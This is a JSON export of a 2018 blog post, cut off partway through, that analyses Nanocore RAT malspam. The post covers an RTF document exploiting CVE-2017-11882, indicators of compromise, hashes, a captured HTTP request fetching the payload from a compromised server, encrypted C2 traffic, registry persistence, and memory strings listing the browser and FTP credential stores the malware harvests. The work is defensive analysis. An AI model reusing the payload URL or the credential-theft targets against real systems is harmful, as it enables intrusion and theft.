{"id":1196,"date":"2018-11-01T13:16:46","date_gmt":"2018-11-01T13:16:46","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=1196"},"modified":"2018-11-01T13:16:46","modified_gmt":"2018-11-01T13:16:46","slug":"2018-10-31-nanocore-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=1196","title":{"rendered":"2018-10-31 Nanocore Malspam"},"content":{"rendered":"<p>While looking through the email filters this morning, I came across several emails that had malicious Word docs attached to them. The sender was the same for all the emails along with the document that was attached. This is a write-up of what I was able to get from the malware on my VM. After doing some research it looks as if this malware is related to the Nanocore RAT. For more information about what this RAT is, please see the following link:\u00a0<\/p>\n<p><a href=\"http:\/\/www.stratosphereips.org\/blog\/2018\/9\/7\/what-do-we-know-about-nanocore-rat-a-review\" rel=\"noopener\" target=\"_blank\">http:\/\/www.stratosphereips.org\/blog\/2018\/9\/7\/what-do-we-know-about-nanocore-rat-a-review<\/a><\/p>\n<p>For all the artifacts from this investigation, please see the the Github repo located <a href=\"http:\/\/github.com\/bloomer1016\/2018-10-31-Nanocore-Malspam\" rel=\"noopener\" target=\"_blank\">here<\/a>.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/email.png\" alt=\"\" width=\"1096\" height=\"966\" class=\"aligncenter size-full wp-image-1197\" \/><\/a><\/p>\n<p>IOCs:<br \/>\n=====<\/p>\n<p>shinkoh[.]com[.]my \/ 210[.]48[.]153[.]240 (TCP 80)<\/p>\n<p>194[.]5[.]98[.]182 (TCP 7020)<\/p>\n<p>Artifacts:<br \/>\n==========<\/p>\n<p>File name: PO.doc<br \/>\nFile size: 3.7K<br \/>\nFile path: NA<br \/>\nMD5 hash: 757e0b687db4d4e78c52165362642d92<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/7fb596b1ca23917da79268796af7238049f2245536a30d6a96b1721740cbff5c\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/7fb596b1ca23917da79268796af7238049f2245536a30d6a96b1721740cbff5c\/detection<\/a><br \/>\nDetection ratio: 19 \/ 57<br \/>\nFirst Detected: 2018-10-31 09:37:11<br \/>\nAny.Run: <a href=\"http:\/\/app.any.run\/tasks\/b1d7fd66-5fdb-44bc-b631-800b60eed5bd\" rel=\"noopener\" target=\"_blank\">http:\/\/app.any.run\/tasks\/b1d7fd66-5fdb-44bc-b631-800b60eed5bd<\/a><br \/>\nFile name: downloads.exe<br \/>\nFile size: 544K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming<br \/>\nMD5 hash: 096c2a7b6d26917ed897638e2d89ee79<br \/>\nVirustotal: http:\/\/www.virustotal.com\/#\/file\/aefd739e1378c37d3e4cdf82217550942ba2222952486c1a0268d9c94f83b776\/detection<br \/>\nDetection ratio: 11 \/ 68<br \/>\nFirst Detected: 2018-10-31 12:29:03<\/p>\n<p>File name: catalog.dat<br \/>\nFile size: 1K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D<br \/>\nMD5 hash: 32d0aae13696ff7f8af33b2d22451028<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/5347661365e7ad2c1acc27ab0d150ffa097d9246bb3626fca06989e976e8dd29\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/5347661365e7ad2c1acc27ab0d150ffa097d9246bb3626fca06989e976e8dd29\/detection<\/a><br \/>\nDetection ratio: 0 \/ 59<br \/>\nFirst Detected: 2018-06-03 17:03:30<\/p>\n<p>File name: run.dat<br \/>\nFile size: 1K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D<br \/>\nMD5 hash: 243846a167653be9f548d6e9ff15fca4<br \/>\nVirustotal: NA<\/p>\n<p>File name: settings.bin<br \/>\nFile size: 1K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D<br \/>\nMD5 hash: 4e5e92e2369688041cc82ef9650eded2<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/f8098a6290118f2944b9e7c842bd014377d45844379f863b00d54515a8a64b48\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/f8098a6290118f2944b9e7c842bd014377d45844379f863b00d54515a8a64b48\/detection<\/a><br \/>\nDetection ratio: 0 \/ 59<br \/>\nFirst Detected: 2017-03-27 03:35:44<\/p>\n<p>File name: storage.dat<br \/>\nFile size: 417K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D<br \/>\nMD5 hash: 963d5e2c9c0008dff05518b47c367a7f<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/5eacf2974c9bb2c2e24cdc651c4840dd6f4b76a98f0e85e90279f1dbb2e6f3c0\/details\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/5eacf2974c9bb2c2e24cdc651c4840dd6f4b76a98f0e85e90279f1dbb2e6f3c0\/details<\/a><br \/>\nDetection ratio: 0 \/ 59<br \/>\nFirst Detected: 2016-02-02 18:46:20<\/p>\n<p>File name: wanss.exe<br \/>\nFile size: 544K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D\\WAN Subsystem<br \/>\nMD5 hash: 096c2a7b6d26917ed897638e2d89ee79<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/#\/file\/aefd739e1378c37d3e4cdf82217550942ba2222952486c1a0268d9c94f83b776\/detection\" rel=\"noopener\" target=\"_blank\">http:\/\/www.virustotal.com\/#\/file\/aefd739e1378c37d3e4cdf82217550942ba2222952486c1a0268d9c94f83b776\/detection<\/a><br \/>\nDetection ratio: 11 \/ 68<br \/>\nFirst Detected: 2018-10-31 12:29:03<\/p>\n<p>File name: KB_272984.dat<br \/>\nFile size: 1K<br \/>\nFile path: C:\\Users%username%\\AppData\\Roaming\\23A8A75E-E6D9-4C28-881C-1B596423337D\\Logs%username%<br \/>\nMD5 hash: d8ec13785158551956718439b276b49a<br \/>\nVirustotal: NA<\/p>\n<p>Analysis:<br \/>\n==========<\/p>\n<p>This maldoc is not an actual Word document, but actually a RTF file as seen by running the command &#8220;file&#8221; against the file:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nMQ60M2FVH6:Maldoc herbie.zimmerman$ file PO.doc \r\nPO.doc: Rich Text Format data, unknown version\r\n<\/pre>\n<p>and also via the rtfobj command which is included in the OLETools found here: http:\/\/github.com\/decalage2\/oletools.\u00a0<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nMQ60M2FVH6:Maldoc herbie.zimmerman$ rtfobj PO.doc \r\nrtfobj 0.53.1 on Python 2.7.10 - http:\/\/decalage.info\/python\/oletools\r\nTHIS IS WORK IN PROGRESS - Check updates regularly!\r\nPlease report any issue at http:\/\/github.com\/decalage2\/oletools\/issues\r\n\r\n===============================================================================\r\nFile: 'PO.doc' - size: 3749 bytes\r\n---+----------+---------------------------------------------------------------\r\nid |index \u00a0 \u00a0 |OLE Object\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n---+----------+---------------------------------------------------------------\r\n0\u00a0 |0000003Fh |format_id: 2 (Embedded) \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n\u00a0\u00a0 |\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |class name: 'eqUAtioN.3'\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n\u00a0\u00a0 |\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 |data size: 1798 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0\r\n---+----------+---------------------------------------------------------------\r\n<\/pre>\n<p>Based on the output from rtfobj, we can see that this is leveraging the Microsoft Equation editor buffer overflow exploit (CVE-2017-11882). For more information about how this works, please see Palo Alto&#8217;s Unit 42 write up here: http:\/\/researchcenter.paloaltonetworks.com\/2017\/12\/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild\/.\u00a0You can also see this operation via the Process Tree from Process Monitor as seen below.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/proctree.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/proctree.png\" alt=\"\" width=\"1654\" height=\"55\" class=\"aligncenter size-full wp-image-1199\" \/><\/a><\/p>\n<p>Once the exploit has taken hold, the Equation Editor pulls down the file called &#8220;_outputA446BDFrolex.exe&#8221; which then gets copied over to the &#8220;C:\\Users%username%\\AppData\\Roaming&#8221; path and then gets executed (PID 2588).<br \/>\n\u00a0<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/_outputA446BDFrolex.exe HTTP\/1.1\r\nAccept: *\/*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)\r\nHost: shinkoh.com.my\r\nConnection: Keep-Alive\r\n\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Wed, 31 Oct 2018 16:29:19 GMT\r\nServer: Apache\r\nLast-Modified: Wed, 31 Oct 2018 00:04:46 GMT\r\nAccept-Ranges: bytes\r\nContent-Length: 556960\r\nConnection: close\r\nContent-Type: application\/x-msdownload\r\n\r\n\r\nMZ......................@.............................................\t.!..L.!This program cannot be run in DOS mode.\r\n\r\n\r\n$.........y.....................................Rich............PE..L...Sp.=.....................`....................@..........................`..............................................T...(........C...........`......................................................(... .......&lt;............................text............................... ..`.data...$...........................@....rsrc....C.......P..................@..@...I............MSVBVM60.DLL...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.\t.f.j.f1h.f...f)..f...fbr.f...fA\t.f.v.f.n.fvj.f+d.f.v.f:..ft.\r\nfn..f..\r\nf.I.f...f..\r\nf...fX..f...f\/p.f.b.f=N.ft..f...f..\r\nf...f..\r\nf.\t.f\r\n.\r\nf...f...f...f.G.f...f...f...f.u.fH..f}i.f+..f_S\r\nfg..f7.\r\nf:..f:..fJl.f.l.fT.\r\nfn..f...f.5.f\/N.f.&quot;\r\nf..\r\nf...f...fpu.f.m.fM..f...f0l.f&gt;. \r\n<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/file-1.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/file-1.png\" alt=\"\" width=\"1724\" height=\"305\" class=\"aligncenter size-full wp-image-1198\" \/><\/a><\/p>\n<p>Once the original process for &#8220;downloads.exe&#8221; (PID 2588) has been running for a bit, it opens another instance of itself (PID 3040) and this is the process that writes out the other files within the &#8220;Roaming&#8221; folder and the sub-folders. It is the process that is also responsible for reaching back out to the IP address of 194.5.98.182 on port 7020 which looks to be encoded or encrypted.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n 8...._..C.!.W*?.y..y.d..\tq...h ..].......Nk0..oI|M.)0#.....\r\n.......2CY.x .......S......mn.hp.B...:ge..&amp;K.U%........|&gt;aYB....'....3..St.uL..#ZcG..X.D.ib.Y....s.n.....AV.p..z..}W..y%......v..C....T8qc......\/....U.\t.A~s|.&quot;.\\H\/.b.&amp;0..&lt;F8|.$j......x.y.....6{.2z.w.\\....0....-.&lt;.......Q{!L.sW\\..P_.q.h.~....s.(.&gt;.a.ze..6.=...E..&gt;3V.)...........(j........~..z.....s.0&lt;.....rR.A....!...i5{...8..\/\r\n.@..:...C}......\r\nzF\r\n)..x...8.....j.T.............d..(G.............'....\r\n?^.A........h..F8!3.X.U.c1..J.v......JdN..A....k(H.z...`l...b.\\g..a..5.$8 .l..bsnF(klj.........9N.$r.\t1....8..]...o.....G-t|...-......._y._......l'..+$.....Y].M...C....N:.5.cD`.sd.}r=...R.w.....'....3..St.uL..#.#..v&amp;._.V....._..\r\n..p..YC....N.n..f.mf.e...B&#x5B;...-.+..vp1..\/RBf.0..r9,.....bi..\\.K.v......{..2........8.^...)g.....e..&quot;s.t..!....._..$......:3... ........2bl...g,.i.K..%4..Q...4....9.:2..K...B.Tgo@T..hx..\r\n..&quot;...B;C...........X....Z...2.Kv....&quot;4..S)...k...&lt;....6?.k...V~...9\\P..|..&amp;b...;;.....Hz.Hn.X.|...C0A0=..@..~#.W...Yl.CO^..$....kn.q..c.,.ts....xY....v..l;.^.%f.y........?vt...7.K...eV......&#x5B;..&quot;}c3..G.d.e..D\\N.4s..*......l.o&#x5B;.........j...6.-sg.n...2.}.X......@L..jTI...!PR?3]..kk....\t....&#x5B;.H'u..._.2.L....Am....!;k....1.nP*V....LfK|f..G..u......K.y......]...ET..yE3...\r\n..}|..H\t:.c..]I...W\r\nT......Lf!5&lt;.Emd.u...%?..c1P....t.{.7L.'.........Ax..x,........S*..;..-g..6.-V..@.6s......N...'.+......'.....S.p..G.m.P.o........M].G.....Hl..}&gt;.,.2.fn....&gt;ic.zYP.....2....R.9A.Ht]#.q...{......wj^.(....b.v@...&#x5B;DQi.(}e|.\tVi.\t....2..Q,G.{..............Z..#R..H....V...N+\\.~lp,...&#x5B;......7p.,\r\n..9Y.&quot;...8.Y....{...x.~.@..s3,..d..k.*Fa...0.:9*.J...&#x5B;.G.H..&#x5B;5....d....{...Z.J..]t.J...7hF....I...h,I_m.H.x&quot;Bd..;`m,...R.....LO.8$ ..x.$.....o.q7....W...Yu&#x5B;..J.%.....,...Yl.a...T.}.....Y%nUg...Kl..r.....M....k.o........GZ.&quot;E.J...&lt;of..A........h......G|..r.H,.....j...........8&lt;ml.....2t`\/#.p.Y..&amp;.2.q..9...(&#x5B;.z.b\\.e.....F&gt;.........?...k2Yu..'B..b.N8.&amp;kFt......)....cY5=.z.q....i............?...R...\\.f?....U@.,....kT'.q..&gt;VD...j0.*.....U.M.....&lt;...}4E|H.8.y|1.O^..v.I...Xc....OU..n..jBvV.n.......U.OTN.0-C...k....|.?.......hI)z..Y...Y,...7(.......m..h&#x5B;.U.....cQ0M?...N.q.j...&gt;..1N.......2W...'c....2..............s.;.m.....0#.7.aJp.j...*.L.EV.M...d....}...C.;..h...u{.l.y.Z.....=.f.$. ,~JQ`R..p....q6.(0.&lt;r.g...\r\n~.{3.....U..}\r\n.M.{..,2...+c..a..8....'&amp;\t.^H.\r\ni4.8...To....{\/..w...@.\tP.l+.I z....s.....V\ta....hY.g...}.~..F\t.6..\r\n.P\/..!#....1...aLe...cH.xw2.@..@......2w]... ...e.u...........lN...vf..lf........:\/.....&quot;..(..&gt;...?.x.D..&#x5B;.0oN,.M.3.{.&lt;\t&quot;Z.=8.....^X..=..*:....F@.b...?...V....KI{.....?`......G.R=....1..Ev).&#x5B;....\\.}.9|O..0......b8&quot;.?.....N....S ....S...kR.e..vy.......#...v....G&amp;.D..^..4.K.\r\n&quot;z..!.idA.Hs%...E..G.....!.\tc.W.-.IS..WC6...f................KmJX.&quot;{0....Mf..(..eq.B....\\...Z......N.\/..\\|j=.4.....)...d...O.......I..h.....].M$.u..Y.(|^._...I...*.O...{.^..+G..C..M.o..!.=..R?....%..=,..-.....D..6..\r\n..MWq.....d.].xiu.cx......M._.. .....@X.3x..\\...\r\n:..\/:.......:2.&amp;.#...).o.t...J..#'....k..&amp;.K\r\nQ.{.tu.....].+.8...qHi..3_..6...]....%.?8y..mwA.....(*oJI.&lt;5.&gt;.]um..ky.......-&gt;.C.o...-.S...$..G`55Z.Z..C.G8....?w..l..x...Bl!.(r\\...b..8..zIo.......@f..IGt-~.(.j.T.i.C.]...z..^.&quot;..#...PB.T.c...?u....z.S:.`..d?.\\@p.q&quot;&#x5B;.F...Tm..^..........'..P..\r\n.H.'W...f'.z.{...S..vM\r\n.t.i7.....-...&lt;...qo.77.........Lz.m..'j&quot;V77..X..tt..t!....QRi....D......K3...#y.F.B.....q..?..........qu......FS.d..`l4..._...+.....]..........e......&lt;B.f....)9FS.\t..r..~a.-W&amp;..!..UT..+e.d....-..g....|.......C=...g.J..&gt;..E..!.....-....!D......Z\r\n..2...q.....A.n...ll...m....{F......#.\/c....F..5e.e...Y...].s..:.f.@...$d..g`.m.Z9....k;.m........H...U..:..n....SJ.......!.LL..Q...T..H.{.9fU.bN.......*-...........\t@...%,..1.XG^y..).....4A..l...S..,ZB...s.....&lt;.%.C.-..(.z.........p.Z.?...rB.JZ.......Q.\ttU....B+...)H.&quot;.\\....&gt;..H..H&quot;.N..u&lt;\\......Bb..4.e.\/....bN\t..a|.A...^.x..P'B+.JF..&gt;sYD.6....\/Y. C~..'...n2.x.ZxK.JC... .0..6.....\r\nU..:....,..^O.......\t......M~..i..C&#x5B;..\r\n..*..m........9.....%=b.R]...^W.,........r...la.....v!...9....&quot;z..1..+..\r\nL.AA....4Lg..C..........U..&amp;.&quot;f.X32....&amp;.....6f&#x5B;..YK..._l.z.x.\/\t..i&#x5B;9.7.&quot;..6.ED.]y..\\..hJ*...6Td.B\/V...triJ...l....J&#x5B;1....t..Dy..-$......5......;:M...s.U@....W.b....\\.H.&lt;.*..V..\r\n....{..a..,.d!...........Z..zM?.q......h......)i&#x5B;s.8.;..0]....hj.,.|PX.......evR..v..(..o....Q7.....D}...\\.10.D&#x5B;..r.Q.G..f.|.CG..#...8..4.&lt;...b`....P.......gy?mR.x...?....L....?........o.B.^.p..-..L.#.........\r\nCO.5.J..t.j....$hO .D.;..hE\r\nc...}.KWD.(.......j..Gf....7..y........y^......s.,..K0\r\nj1&lt;...e(.Kek.DLYu!z. .......P..or.....+9...@&amp;B...N\t...o..\r\n.T&#x5B;dF....4L...)V....P...Pm...Q...A..;...]....&gt;}.....w..\t$.....3.C.,..bx.....)R......r.-z..}..n....&#x5B;.1...C..gI......J..Vd...\t.h....|..Z... .\/n..ST&amp;....|2.}.EE-+.....4pq.....O..I.....(.)....U..3.K.i..O..z....$.}.\t..@.`9..._.... &gt;..g3...,.x.HpS.........3Fz.KaB....\\...LN.x.&amp;....dq......!N.}$.._...vV.u.1j..............':DC.+..&quot;E@S.2..|7^`........y0uF.P\t....+.29.Ce.f.-.6..C...cX..o.r.Eg...% S.,D.E..K_.P:..AF@.......^\t...P.Xv.....p.f$??.\\.%..H\/wl......P.D...\t.+....U!zK...B.Dw.&gt;...k..S........h.x|..-...E.......&quot;.m..R... .d.ak+....k\t..^.....).lN.t.(K..R.P..&gt;.T.,.....#.g.0..+T.R@....DM.E...yuu..~.5W...A..h^.....tn..s...X....|].(.{!r.\\_.R...N..q.......t........b.u..q.\/r.uT&amp;|...X.2M4po.*0A..........3....a`.aU ._.)....F.*......w...*.o........hjb.Y..&quot;J..+q.. =.z..&lt;.......x._..=.... *......h.8.EUD.M..L.6.h.2.8..!...H..x`. x..d...I....M.R+.5..`.T.. m.,......\\..)......]X.zl...(.zD..e...bP..bi.3...V.Q+.;........n.........9zR....v...W.`........m..V...G.5C8wk~qV..I...$.M..r..,..N.D.....b..v..*....k.D2F..di....&amp;....x.....{&amp;....7.p...DZ\/...}.......5w.N.8......Ecgh.\/h6.o..5z.....;Q.P.....C=....6.PRF..1....%T...&lt;F...SB.....O..y.0*.T.E.....y...l h4..&amp;.{.....h....G.0$L..ER_4..+@...1.v..n...&amp;5....&lt;\t....5.'....$..'.M.........K..\\C..V:2Z.\tr.&#x5B;.y.W.@...!.\r\n...&amp;.Q.5.Ru....|.9.3}&gt;..o.C.Rm.......T&quot;n,S.k.Ja..O..T.LPr.....j.rl&lt;.%..d.t7..n....@@B.Yl.....5.K\\&quot;f#V8..1K.{.=..)...r....!:.\t.2?...Vx9\/u..:.fo..Y.Q.3.;..T....4.yv.]2.u...Z.S.... .7....8-!.@.IA...4.\\8).qii....!..C.....bI....O.E}.&amp;....N..x.#.....z..pq..%a.._.n1\\7..b*\r\n....&lt;rest of the stream&gt;\r\n<\/pre>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/wireshark.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/wireshark.png\" alt=\"\" width=\"1887\" height=\"642\" class=\"aligncenter size-full wp-image-1201\" \/><\/a><\/p>\n<p>As for the *.dat files, there was nothing readable in these files with the exception of the file called &#8220;KB_272984.dat.&#8221; I am not exactly sure what this log file is for as it did not capture any keystrokes from what I can tell.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\n m\u00d9\u00d9&#x5B;&#x5B;explorer] Start menucmd \u00d0\u00d9\u00d9&#x5B;#&#x5B;Wireshark] Wireshark: Save file as2018-10-31-nanocoe-re l\u00da\u00d9&#x5B;&#x5B;explorer] Program Manager2018-10-31-nanocore \r\n<\/pre>\n<p>Persistence is maintained via the &#8220;HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WAN Subsystem&#8221; key.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/reg.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2018\/11\/reg.png\" alt=\"\" width=\"726\" height=\"232\" class=\"aligncenter size-full wp-image-1200\" \/><\/a><\/p>\n<p>I also ran the tool called &#8220;strings2&#8221; against the PID 3040 to see if there was anything that may be gleaned from memory. From just looking around in that log, there were some things of interest once I looked for the word &#8220;nano.&#8221; From what I was able to see, there are a lot of Japaense domains (..jp) as seen below.<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nac.jp\r\nad.jp\r\nco.jp\r\ned.jp\r\ngo.jp\r\ngr.jp\r\nlg.jp\r\nne.jp\r\nor.jp\r\naichi.jp\r\nakita.jp\r\naomori.jp\r\nchiba.jp\r\nehime.jp\r\nfukui.jp\r\nfukuoka.jp\r\nfukushima.jp\r\ngifu.jp\r\ngunma.jp\r\nhiroshima.jp\r\nhokkaido.jp\r\nhyogo.jp\r\nibaraki.jp\r\nishikawa.jp\r\niwate.jp\r\nkagawa.jp\r\nkagoshima.jp\r\nkanagawa.jp\r\nkochi.jp\r\nkumamoto.jp\r\nkyoto.jp\r\nmie.jp\r\nmiyagi.jp\r\nmiyazaki.jp\r\nnagano.jp\r\nnagasaki.jp\r\nnara.jp\r\nniigata.jp\r\noita.jp\r\nokayama.jp\r\nokinawa.jp\r\nosaka.jp\r\nsaga.jp\r\nsaitama.jp\r\nshiga.jp\r\nshimane.jp\r\nshizuoka.jp\r\n<\/pre>\n<p>There were other domain names as well, but I can not be for certain as to why they are there.<\/p>\n<p>I also found some calls to what looks to be the Visual Studio project for Nanocore for a couple of different users:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nG:\\Users\\Andy\\Documents\\Visual Studio 2013\\Projects\\NanocoreBasicPlugin\\NanoCoreBase\\obj\\Debug\\NanoCoreBase.pdb\r\nP:\\Visual Studio Projects\\Projects 15\\NanoNana\\MyClientPlugin\\obj\\Debug\\MyClientPlugin.pdb \r\nC:\\Users\\Liam\\Documents\\Visual Studio 2013\\Projects\\NanoCoreStressTester\\NanoCoreStressTester\\obj\\Debug\\NanoCoreStressTester.pdb\r\nC:\\Users\\Cole\\Documents\\Visual Studio 2013\\Projects\\FileBrowserPlugin\\FileBrowserClient\\obj\\Debug\\FileBrowserClient.pdb\r\n<\/pre>\n<p>along with some information\/credentials that it was trying to obtain:<\/p>\n<pre class=\"brush: plain; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nSending shit\r\n&#x5B;NanoScript] Connection to host has been lost, NanoScript will now remove all unwanted files.\r\nRemoving files\r\nGetDrives\r\n&#x5B;Drive]|\r\n&#x5B;Folder]|\r\nname\r\nFullName\r\n&#x5B;File]|\r\nName\r\nLength\r\nRecieving passwords\r\n.vbs\r\nBatch\r\n.bat\r\nHTML\r\n.html\r\n.PHP\r\nProcessing Command\r\nabcdef123456789\r\nC:\\Users\\\r\n\\AppData\\Local\\Temp\\\r\n|Executed!\r\nExecuting Command\r\n&#x5B;NanoScript] Cleaning up files...\r\nWallet\r\n\\Google\\Chrome\\User Data\\Default\\Login Data\r\nReadTable\r\nlogins\r\nGetRowCount\r\nGetValue\r\norigin_url\r\nusername_value\r\nGetBytes\r\npassword_value\r\n|&#x5B;Chrome]\r\nAPPDATA\r\n\\CoreFTP\\sites.idx\r\nHKEY_CURRENT_USER\\Software\\FTPWare\\COREFTP\\Sites\\\r\n\\Host\r\n\\Port\r\n\\User\r\n\\Name\r\n|&#x5B;CoreFTP]\r\n\\FileZilla\\recentservers.xml\r\n&lt;Host&gt;\r\n&lt;\/Host&gt;\r\n            \r\n&lt;Port&gt;\r\n&lt;\/Port&gt;\r\n&lt;User&gt;\r\n&lt;\/User&gt;\r\n&lt;Pass&gt;\r\n&lt;\/Pass&gt;\r\n|&#x5B;FileZilla]|No Password Saved|\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\FTP Commander\\UninstallString\r\nuninstall.exe\r\nFtplist.txt\r\n;Server=\r\n;Port=\r\n;Password=\r\n;User=\r\n;Anonymous=\r\nName=\r\n|&#x5B;FTPCommander]\r\nWScript.Shell\r\nRegRead\r\nError\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Vitalwerks\\DUC\r\nUsername\r\nPassword\r\nThere is no host!\r\n|&#x5B;NO-IP]\r\n\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\\r\n\\SmartFTP\\Client 2.0\\Favorites\\Quick Connect\\*.xml\r\n&lt;Password&gt;\r\n&lt;\/Password&gt;\r\n&lt;Name&gt;\r\n&lt;\/Name&gt;\r\n|&#x5B;SmartFTP]\r\nIndexOf\r\nSubstring\r\nUNIQUE\r\ntable\r\nSQLite format 3\r\nNot a valid SQLite 3 Database File\r\nAuto-vacuum capable database is not supported\r\nNo supported Schema layer file-format\r\nhttp:\/\/\r\nwww.\r\nPOST \/ HTTP\/1.1\r\nHost: Content-length: 5235\r\n&#x5B;SST] Client has sent \r\n bytes \r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>While looking through the email filters this morning, I came across several emails that had malicious Word docs attached to them. The sender was the same for all the emails along with the document that was attached. This is a write-up of what I was able to get from the malware on my VM. After doing some research it looks as if this malware is related to the Nanocore RAT. For more information about what this RAT is, please see the following link:\u00a0 http:\/\/www.stratosphereips.org\/blog\/2018\/9\/7\/what-do-we-know-about-nanocore-rat-a-review For all the artifacts from this investigation, please see the the Github repo located here. IOCs:&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1196\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-1196","post","type-post","status-publish","format-standard","hentry","category-packet-analysis"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1196"}],"version-history":[{"count":2,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp